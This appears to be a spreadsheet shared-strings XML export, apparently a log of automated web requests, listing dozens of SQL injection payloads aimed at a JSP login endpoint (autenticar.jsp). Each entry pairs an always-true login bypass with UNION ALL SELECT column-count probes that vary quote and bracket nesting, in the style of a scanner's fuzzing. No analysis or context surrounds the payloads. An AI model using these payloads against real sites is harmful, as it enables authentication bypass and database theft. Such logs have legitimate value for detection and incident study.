    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548,9548#and((('mljb'='mljb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538,8538#and((('cyhu'='cyhu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734#and((('kgov'='kgov</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587,3587#and'bixq'='bixq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237#and'sqjc'='sqjc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855#and'aywq'='aywq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555#and'jxgx'='jxgx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364,6364#and'fitv'='fitv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460,4460#and'gmet'='gmet</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793,4793#and'qybz'='qybz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801,5801#and'exmh'='exmh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711,2711#and'gzez'='gzez</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921#and'rdoh'='rdoh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823#and('qaxg'like'qaxg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804#and('otps'like'otps</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373,1373#and('jiig'like'jiig</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621,6621#and('smrw'like'smrw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685,3685#and('ciup'like'ciup</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711#and('vaxq'like'vaxq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969,6969#and('erkb'like'erkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423#and('jfsw'like'jfsw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844#and('aetc'like'aetc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610,8610#and('rzxp'like'rzxp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121,3121#and(('gniu'like'gniu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672#and(('itjt'like'itjt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870,8870#and(('mqyj'like'mqyj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312#and(('cynd'like'cynd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001,2001#and(('aray'like'aray</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047#and(('naut'like'naut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941,4941#and(('rfvd'like'rfvd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078,5078#and(('aley'like'aley</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201,1201#and(('eizw'like'eizw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704#and(('vizu'like'vizu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551,7551#and((('lxdb'like'lxdb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621,3621#and((('nygl'like'nygl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611,9611#and((('xxso'like'xxso</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063,5063#and((('bfga'like'bfga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898,8898#and((('vjbp'like'vjbp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421#and((('zylm'like'zylm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770,4770#and((('nnuf'like'nnuf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604#and((('ongn'like'ongn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618,5618#and((('svtj'like'svtj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551#and((('vdzi'like'vdzi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159,7159#and'ydex'like'ydex</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093#and'rdgo'like'rdgo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041,6041#and'ljig'like'ljig</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316,6316#and'mewh'like'mewh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104,2104#and'nsvn'like'nsvn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535#and'kupr'like'kupr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312,1312#and'ddhk'like'ddhk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623,6623#and'rwzx'like'rwzx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345,2345#and'bpzt'like'bpzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343,6343#and'rzpn'like'rzpn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885,1885#and("gyvt"="gyvt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829,8829#and("hoya"="hoya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967#and("mcuq"="mcuq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902#and("lmxk"="lmxk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157#and("clrz"="clrz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18#and("tjmv"="tjmv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462,1462#and("rlum"="rlum</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204#and("tcab"="tcab</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372,4372#and("igoc"="igoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337#and("zdav"="zdav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422,2422#and(("coij"="coij</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693,3693#and(("assw"="assw</t>
  </si>
  <si>
